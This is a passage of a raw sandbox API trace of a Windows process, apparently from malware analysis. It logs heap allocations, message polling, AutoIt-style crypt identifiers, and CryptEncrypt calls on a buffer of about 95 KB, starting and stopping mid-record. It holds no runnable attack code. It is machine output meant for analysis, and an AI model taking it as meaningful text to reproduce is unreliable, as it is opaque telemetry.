Size=0x8) returned 0x7da2c8 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.929] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.929] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.930] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0031.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.931] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.934] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.934] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.934] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.934] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.934] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.934] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.934] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.934] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.934] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.934] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0031.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.934] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.934] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.935] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.935] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.935] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.935] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.935] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.935] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.935] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.935] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.935] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.935] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.935] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.936] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x173c2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x173d0) returned 1 [0031.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.936] CharLowerBuffW (in: lpsz="byte[95185]", cchLength=0xb | out: lpsz="byte[95185]") returned 0xb [0031.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.938] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 